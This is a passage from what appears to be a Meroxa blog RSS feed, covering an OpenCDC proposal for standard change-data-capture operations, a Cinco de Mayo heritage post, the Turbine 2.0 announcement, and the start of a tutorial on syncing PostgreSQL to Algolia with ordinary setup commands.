&lt;p&gt;The practical implications of this are you lose the ability to map updates and deletes and are often left with append-only style inserts.&lt;/p&gt;
&lt;p&gt;Here’s what the previous CDC record looks like after it has been&lt;em&gt;unwrapped&lt;/em&gt; so that it can be pushed down to sink connectors:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anne Marie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Kretchmar&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;newemail@example.com&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;What’s the ideal situation?&lt;/h3&gt;
&lt;p&gt;Ideally,&lt;em&gt;all&lt;/em&gt; sink/destination connectors will support&lt;em&gt;all&lt;/em&gt; CDC operations and map them to whatever makes sense for the resource. If the resource can support updates, then update the correct record. If it can’t, you can create a new record with the operation included as a field.&lt;/p&gt;
&lt;p&gt;This way resources such as operational databases can be kept in sync (with updates and deletes being applied) and append-only behavior (if desired e.g. for compliance) can still be enforced but optionally at the sink instead.&lt;/p&gt;
&lt;h3&gt;What is OpenCDC?&lt;/h3&gt;
&lt;p&gt;In order to move the community toward the goal of ubiquitous CDC interoperability, Meroxa is proposing at least initially a set of guidelines under the project name OpenCDC.&lt;/p&gt;
&lt;p&gt;Specifically, we’re advocating for standardizing on a minimal set of CDC operations loosely based on those introduced by the Debezium connectors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create (&lt;code class=&quot;language-text&quot;&gt;c&lt;/code&gt;) - Newly created records&lt;/li&gt;
&lt;li&gt;Read (&lt;code class=&quot;language-text&quot;&gt;r&lt;/code&gt;) - Records read as part of a snapshot&lt;/li&gt;
&lt;li&gt;Update (&lt;code class=&quot;language-text&quot;&gt;u&lt;/code&gt;) - Records that have been updated&lt;/li&gt;
&lt;li&gt;Delete (&lt;code class=&quot;language-text&quot;&gt;d&lt;/code&gt;) - Records that have been deleted&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The above list provides a base starting point. There are compelling arguments for supporting (and distinguishing) additional operations such as DDL operates and/or resource-specific operations such as truncate.&lt;/p&gt;
&lt;h3&gt;What’s Next&lt;/h3&gt;
&lt;p&gt;We want to shape these guidelines based on input from the community. If you’re interested in helping to define these guidelines, contact us at&lt;a href=&quot;mailto:info@meroxa.com&quot;&gt;info@meroxa.com&lt;/a&gt; with the subject line&lt;em&gt;&lt;strong&gt;OpenCDC&lt;/strong&gt;&lt;/em&gt; or connect with us on&lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;FAQ&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Why “guidelines” and not a standard?&lt;/strong&gt; Our long-term goal is to ultimately have a standard or specification for OpenCDC, but to get there we first need to land on the set of core operations to support. By starting with guidelines, we’re able to shape these guidelines based on input and feedback from the community.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Is OpenCDC a format?&lt;/strong&gt; The term “format” is overloaded in the data integration space and we’re wary of using it in the context of OpenCDC. Ideally, OpenCDC would be a specification for the contents of the OpenCDC record (i.e. the fields themselves and their data types). The actual format would be independent where the record could be encoded into Avro, Protobuf, or JSON.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Who is involved with this?&lt;/strong&gt; We’re currently talking to a large (and growing) list of organizations that share our interest in delivering CDC interoperability. If you’re interested in getting involved, please reach out to us at&lt;a href=&quot;http://info@meroxa.com/&quot;&gt;info@meroxa.com&lt;/a&gt; or jump into our&lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord server&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Who “owns” OpenCDC?&lt;/strong&gt; Our intention is to operate OpenCDC as a community-driven project. Ideally, one that is governed by an established foundation such as the CNCF or similar.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Hold the Guacamole: Rethinking Cinco de Mayo]]></title><description><![CDATA[Cinco de Mayo is here, and though many people make reservations with friends to eat at their favorite taco spot, let’s take time to honor Mexican heritage.]]></description><link>https://meroxa.com/blog/hold-the-guacamole-rethinking-cinco-de-mayo</link><guid isPermaLink="false">https://meroxa.com/blog/hold-the-guacamole-rethinking-cinco-de-mayo</guid><dc:creator><![CDATA[Idalin Bobe]]></dc:creator><pubDate>Thu, 05 May 2022 18:27:00 GMT</pubDate><content:encoded>&lt;p&gt;Cinco de Mayo is here, and though many people make reservations with friends to eat at their favorite taco spot, let’s hold the guacamole and margarita and take time to honor Mexican heritage.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Two Truths and A Lie:&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Mexican heritage is NOT about drinking.&lt;/li&gt;
&lt;li&gt;Most Mexicans don’t celebrate Cinco de Mayo.&lt;/li&gt;
&lt;li&gt;Cinco de Mayo is Mexico’s Independence Day.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Sadly, many people in America celebrate Cinco de Mayo because they think its Mexico’s Independence Day. However, September 16 is Mexico’s Independence Day. Cinco de Mayo is a day to honor the Battle of Puebla Day, commemorating the defeat of Napoleon III in 1862.&lt;/p&gt;
&lt;h3&gt;How Did Cinco De Mayo Celebrations Get Started in the U.S.?&lt;/h3&gt;
&lt;p&gt;In the 1960s, &lt;a href=&quot;https://www.history.com/news/chicano-movement&quot;&gt;Chicano activists&lt;/a&gt; in the U.S. wanted to stand in solidarity with the civil rights movement and reclaim a time where people united, against all odds, to defeat colonialism — AND WON! The Chicano activists in the Southwest and west coast of America celebrated Cinco de Mayo to reclaim history and honor the mostly poor, primarily &lt;a href=&quot;https://globalgrind.com/5050249/happy-cinco-de-mayo-five-fast-facts-about-the-holiday-linked-to-african-american-history/&quot;&gt;Afro-Mexican&lt;/a&gt; and indigenous soldiers, who fought against a mighty European colonial force.&lt;/p&gt;
&lt;p&gt;The civil rights movement in the United States of North America called for solidarity across all working-class communities, especially Black and Brown communities. During this era, leaders like &lt;a href=&quot;https://en.wikipedia.org/wiki/Cesar_Chavez&quot;&gt;Cesar Chavez&lt;/a&gt; and &lt;a href=&quot;https://en.wikipedia.org/wiki/Dolores_Huerta&quot;&gt;Dolores Huerta&lt;/a&gt; organized farmworkers, undocumented youth, and housing advocates to stand up for human rights. In a ploy to grow closer to this young and vibrant growing population, corporate America promised to make donations across several organizations in exchange for joining the Cinco de Mayo celebrations. Sadly, it wasn’t long before mass marketing campaigns took over the day and co-opted the movement with &lt;a href=&quot;https://www.cwu.edu/sites/default/files/Sanchez%20Cinco%20de%20Mayo%201.pdf&quot;&gt;Drink-O-Mayo&lt;/a&gt; slogans. By the 1990s, thanks to the commercialization of the day, many people in America had no idea what Cinco de Mayo represented, but we knew it was a day to celebrate with a drink.&lt;/p&gt;
&lt;h3&gt;What to do this Cinco De Mayo?&lt;/h3&gt;
&lt;p&gt;As individuals who care about justice, it is always good to be mindful of our actions and how we can unknowingly contribute to negative stereotypes. Suppose we want to celebrate Cinco de Mayo with food and drinks; at the bare minimum, we should celebrate with foods embraced by Mexican culture (sorry, Mexicans do not eat burritos) and purchase food items from Latinx-owned companies.&lt;/p&gt;
&lt;p&gt;More importantly, we can also honor the many people of Mexican ancestry who struggled to uplift social justice demands for human rights. Today, Mexicans still struggle to be treated with respect and dignity. Books to read to learn more about US-Mexico’s history:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.haymarketbooks.org/books/1655-the-border-crossed-us&quot;&gt;The Border Crossed Us: The Case for Opening the US-Mexico Border&lt;/a&gt; by Justin Akers Chacón&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.haymarketbooks.org/books/1086-no-one-is-illegal-updated-edition&quot;&gt;No One is Illegal: Fighting Racism and State Violence on the U.S.-Mexico Border&lt;/a&gt; by Justin Akers Chacón and Mike Davis&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Hello Meroxa 2.0]]></title><description><![CDATA[Since launching last April, Meroxa has become the de-facto platform for creating real-time data pipelines for over 300 companies.]]></description><link>https://meroxa.com/blog/hello-meroxa-2.0</link><guid isPermaLink="false">https://meroxa.com/blog/hello-meroxa-2.0</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 20 Apr 2022 18:15:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;em&gt;&lt;strong&gt;When they go low we go high — Michelle Obama&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Wowsers! What a difference a year makes!!! When Ali and I founded&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;, our goal was simple: turn real-time data into the default input for how companies deliver customer value. Since launching last April, Meroxa has become the de-facto platform for creating real-time data pipelines for over 300 companies pushing billions of events through our infrastructure.&lt;/p&gt;
&lt;p&gt;Our customers have used us to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Build privacy law-compliant real-time analytics dashboard based on geography&lt;/li&gt;
&lt;li&gt;Migrate petabytes of data from legacy, on-premise data warehouses to cloud-native solutions&lt;/li&gt;
&lt;li&gt;Transform legacy, proprietary data from sensors to report on aircraft health in real-time&lt;/li&gt;
&lt;li&gt;Update fraud detection models in real-time to more accurately prevent unauthorized transactions&lt;/li&gt;
&lt;li&gt;Using completed transactions to update a search index in real-time for an e-commerce platform&lt;/li&gt;
&lt;li&gt;Dynamic pricing and driver availability based on demand for an online grocer&lt;/li&gt;
&lt;li&gt;And much, much more…&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While taking a deep dive into who’s actually using our product, we noticed software engineers were increasingly our biggest audience. To better serve their needs, we released a&lt;a href=&quot;https://docs.meroxa.com/docs/introduction/building-pipelines/terraform/&quot;&gt;Terraform provider&lt;/a&gt; so they could programmatically build their pipelines, but if I’m being brutally honest, we knew that wasn’t enough to warrant their attention. This space is extremely crowded. There are 1700+ tools in the marketplace that help folks move data from one place to the next at various speeds and fidelity. Even with a plethora of point solutions in the “modern” data stack, engineers are spending more time dealing with the nuances of integration instead of delivering business value.&lt;/p&gt;
&lt;p&gt;Alongside our research, we also started hearing increased chatter about the importance of data applications. Today’s manifestation of data apps mostly takes the shape of analytics dashboards. While useful, this still feels a bit underwhelming given the number of data-specific platforms and tools at an engineer’s disposal.&lt;/p&gt;
&lt;p&gt;Fret no more engineers. We heard you loud and clear and I’d like to submit Meroxa’s data application framework, Turbine, for your approval. Turbine represents a big change for not only Meroxa the company (hence the 2.0) but for the industry as well. Most of the tools in the data space focus on low code dashboards to do replication and/or integration. Turbine is a code-first offering that empowers software engineers to use the tools and best practices they’ve been employing for years to solve problems at scale.&lt;/p&gt;
&lt;p&gt;With Turbine being just code, there’s no need to have separate workflows for your app and your data infrastructure. Turbine is to data applications as Rails is to web application development. We provide an opinionated, yet flexible framework that allows engineers to create real-time data solutions in days not months. Want to test the output of a pipeline before deploying it to production? Write unit tests that can be executed locally on your machine. Want to understand the impact of changes to your data model on your existing infrastructure? Write integration tests. Turbine allows you to bring software engineering best practices to the data world without procuring yet another point solution.&lt;/p&gt;
&lt;p&gt;At Meroxa, we understand the importance of easy access to data for our customers so they can in turn provide value to their customers. We’re excited to evolve the data app status quo beyond dashboard visualizations and give engineers the tools to build engaging innovative solutions. If you’re excited and want to learn more about how we put the app in data app, check out the&lt;a href=&quot;/blog/turbine-putting-the-app-in-data-app&quot;&gt;Turbine: Putting the “App” in Data App&lt;/a&gt; blog post,&lt;a href=&quot;http://docs.meroxa.com/&quot;&gt;docs&lt;/a&gt;, and &lt;a href=&quot;https://github.com/meroxa/turbine-examples&quot;&gt;examples&lt;/a&gt; to get started. We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-time Search Indexing with Turbine and Algolia]]></title><description><![CDATA[Learn how to send and continuously sync data to Algolia using Turbine. With Turbine, you can properly test, review, and build data integrations in a code-first way.]]></description><link>https://meroxa.com/blog/real-time-search-indexing-with-turbine-and-algolia</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-search-indexing-with-turbine-and-algolia</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:58:00 GMT</pubDate><content:encoded>&lt;p&gt;Developers often consider using operational databases (e.g.&lt;a href=&quot;https://postgres.org/&quot;&gt;PostgreSQL&lt;/a&gt;,&lt;a href=&quot;https://www.mysql.com/&quot;&gt;MySQL&lt;/a&gt;) to perform search. However, search engines like&lt;a href=&quot;https://algolia.com/&quot;&gt;Algolia&lt;/a&gt; are more efficient for the searching problem because they provide low-latency search querying/filtering and search-specific features such as ranking, typo tolerance, and more.&lt;/p&gt;
&lt;p&gt;Once you have decided on a search engine, your next step is to inevitably answer:&lt;strong&gt;How do you send and&lt;em&gt;continuously&lt;/em&gt; sync data to Algolia?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is where&lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine&lt;/a&gt; comes in. With Turbine, you can properly test, review, and build data integrations in a code-first way. Then, you can easily deploy your data application to Meroxa. No more fragile deployments, no more manual testing, no more surprise maintenance, just code.&lt;/p&gt;
&lt;p&gt;Here is what a Turbine Application looks like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; updateIndex &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./algolia.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token function&quot;&gt;sendToAlgolia&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;updateIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;postgresql&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendToAlgolia&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this article, we are going to create a data application to ingest and sync data from PostgreSQL to Algolia.&lt;/p&gt;
&lt;p&gt;This application uses&lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, but Turbine also has &lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt; and &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt; libraries.&lt;/p&gt;
&lt;p&gt;Here is a quick overview of the steps we will take to get started:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;How it works?&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Setup&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Data Application&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Entrypoint&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Indexing to Algolia&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Secrets&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Running&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Verifying&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deployment&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;What&apos;s next?&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;How it works?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#how-it-works&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A data application responds to events from your data infrastructure. You can learn more about the anatomy of a Javascript data application in the&lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/real-time-search-indexing-with-turbine-and-algolia-c6d19cea6a92b1373d5c31bd71980f8f.png&quot; alt=&quot;Application Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;This data application will:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Listen to&lt;a href=&quot;https://medium.com/meroxa/stream-your-database-changes-with-change-data-capture-aa8797fa9070&quot;&gt;Create, Update, and Delete&lt;/a&gt; events from a Postgres database.&lt;/li&gt;
&lt;li&gt;Write the data to an Algolia index.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Setup&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#setup&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Before we begin, you need to setup a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples&quot;&gt;Clone the example to your local machine&lt;/a&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; clone git@github.com:meroxa/turbine-js-examples.git&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Since this example uses Javascript, you will need to have&lt;a href=&quot;https://nodejs.org/&quot;&gt;Node.js&lt;/a&gt; installed.&lt;/p&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Copy the&lt;code class=&quot;language-text&quot;&gt;search-indexing-algolia&lt;/code&gt; directory to your local machine:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;cp&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; ~/turbine-js-examples/search-indexing-algolia ~/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Install NPM dependencies:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; search-indexing-algolia&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;npm&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to build.&lt;/p&gt;
&lt;h2&gt;Data Application&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#data-application&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A data application responds to events from our data infrastructure. For example, as the customer interacts with PostgreSQL, we need to update the Algolia index.&lt;/p&gt;
&lt;p&gt;You can learn more about the anatomy of a Javascript data application in the&lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
